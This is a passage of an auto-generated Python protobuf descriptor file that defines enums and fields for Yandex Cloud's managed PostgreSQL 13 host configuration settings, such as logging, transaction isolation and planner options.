type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_ERROR_VERBOSITY_DEFAULT', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_ERROR_VERBOSITY_VERBOSE', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=5182,
serialized_end=5335,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_LOGERRORVERBOSITY)
_POSTGRESQLHOSTCONFIG13_LOGSTATEMENT = _descriptor.EnumDescriptor(
name='LogStatement',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.LogStatement',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='LOG_STATEMENT_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_STATEMENT_NONE', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_STATEMENT_DDL', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_STATEMENT_MOD', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_STATEMENT_ALL', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=5338,
serialized_end=5476,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_LOGSTATEMENT)
_POSTGRESQLHOSTCONFIG13_TRANSACTIONISOLATION = _descriptor.EnumDescriptor(
name='TransactionIsolation',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.TransactionIsolation',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='TRANSACTION_ISOLATION_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRANSACTION_ISOLATION_READ_UNCOMMITTED', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRANSACTION_ISOLATION_READ_COMMITTED', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRANSACTION_ISOLATION_REPEATABLE_READ', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRANSACTION_ISOLATION_SERIALIZABLE', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=5479,
serialized_end=5709,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_TRANSACTIONISOLATION)
_POSTGRESQLHOSTCONFIG13_BYTEAOUTPUT = _descriptor.EnumDescriptor(
name='ByteaOutput',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.ByteaOutput',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='BYTEA_OUTPUT_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BYTEA_OUTPUT_HEX', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BYTEA_OUTPUT_ESCAPED', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=5711,
serialized_end=5802,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_BYTEAOUTPUT)
_POSTGRESQLHOSTCONFIG13_XMLBINARY = _descriptor.EnumDescriptor(
name='XmlBinary',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.XmlBinary',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='XML_BINARY_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='XML_BINARY_BASE64', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='XML_BINARY_HEX', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=5804,
serialized_end=5886,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_XMLBINARY)
_POSTGRESQLHOSTCONFIG13_XMLOPTION = _descriptor.EnumDescriptor(
name='XmlOption',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.XmlOption',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='XML_OPTION_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='XML_OPTION_DOCUMENT', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='XML_OPTION_CONTENT', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=5888,
serialized_end=5976,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_XMLOPTION)
_POSTGRESQLHOSTCONFIG13_BACKSLASHQUOTE = _descriptor.EnumDescriptor(
name='BackslashQuote',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.BackslashQuote',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='BACKSLASH_QUOTE_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BACKSLASH_QUOTE', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BACKSLASH_QUOTE_ON', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BACKSLASH_QUOTE_OFF', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BACKSLASH_QUOTE_SAFE_ENCODING', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=5979,
serialized_end=6133,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLHOSTCONFIG13_BACKSLASHQUOTE)
_POSTGRESQLHOSTCONFIG13 = _descriptor.Descriptor(
name='PostgresqlHostConfig13',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='recovery_min_apply_delay', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.recovery_min_apply_delay', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='shared_buffers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.shared_buffers', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='temp_buffers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.temp_buffers', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='work_mem', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.work_mem', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='temp_file_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.temp_file_limit', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='backend_flush_after', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.backend_flush_after', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-2048', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='old_snapshot_threshold', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.old_snapshot_threshold', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\010-1-86400', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_standby_streaming_delay', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.max_standby_streaming_delay', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='constraint_exclusion', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.constraint_exclusion', index=8,
number=9, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cursor_tuple_fraction', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.cursor_tuple_fraction', index=9,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='from_collapse_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.from_collapse_limit', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0141-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='join_collapse_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.join_collapse_limit', index=11,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0141-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='force_parallel_mode', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.force_parallel_mode', index=12,
number=13, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='client_min_messages', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.client_min_messages', index=13,
number=14, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_min_messages', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_min_messages', index=14,
number=15, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_min_error_statement', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_min_error_statement', index=15,
number=16, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_min_duration_statement', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_min_duration_statement', index=16,
number=17, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_checkpoints', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_checkpoints', index=17,
number=18, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_connections', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_connections', index=18,
number=19, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_disconnections', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_disconnections', index=19,
number=20, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_duration', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_duration', index=20,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_error_verbosity', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_error_verbosity', index=21,
number=22, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_lock_waits', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_lock_waits', index=22,
number=23, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_statement', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_statement', index=23,
number=24, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_temp_files', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_temp_files', index=24,
number=25, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='search_path', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.search_path', index=25,
number=26, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='row_security', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.row_security', index=26,
number=27, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='default_transaction_isolation', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.default_transaction_isolation', index=27,
number=28, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='statement_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.statement_timeout', index=28,
number=29, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lock_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.lock_timeout', index=29,
number=30, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='idle_in_transaction_session_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.idle_in_transaction_session_timeout', index=30,
number=31, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bytea_output', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.bytea_output', index=31,
number=32, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='xmlbinary', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.xmlbinary', index=32,
number=33, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='xmloption', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.xmloption', index=33,
number=34, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='gin_pending_list_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.gin_pending_list_limit', index=34,
number=35, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deadlock_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.deadlock_timeout', index=35,
number=36, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_locks_per_transaction', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.max_locks_per_transaction', index=36,
number=37, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_pred_locks_per_transaction', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.max_pred_locks_per_transaction', index=37,
number=38, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='array_nulls', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.array_nulls', index=38,
number=39, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='backslash_quote', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.backslash_quote', index=39,
number=40, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='default_with_oids', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.default_with_oids', index=40,
number=41, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='escape_string_warning', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.escape_string_warning', index=41,
number=42, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lo_compat_privileges', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.lo_compat_privileges', index=42,
number=43, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='operator_precedence_warning', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.operator_precedence_warning', index=43,
number=44, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quote_all_identifiers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.quote_all_identifiers', index=44,
number=45, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='standard_conforming_strings', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.standard_conforming_strings', index=45,
number=46, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='synchronize_seqscans', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.synchronize_seqscans', index=46,
number=47, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='transform_null_equals', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.transform_null_equals', index=47,
number=48, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='exit_on_error', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.exit_on_error', index=48,
number=49, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='seq_page_cost', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.seq_page_cost', index=49,
number=50, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='random_page_cost', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.random_page_cost', index=50,
number=51, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_bitmapscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_bitmapscan', index=51,
number=54, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_hashagg', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_hashagg', index=52,
number=55, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_hashjoin', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_hashjoin', index=53,
number=56, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_indexscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_indexscan', index=54,
number=57, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_indexonlyscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_indexonlyscan', index=55,
number=58, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_material', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_material', index=56,
number=59, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_mergejoin', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_mergejoin', index=57,
number=60, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_nestloop', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_nestloop', index=58,
number=61, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
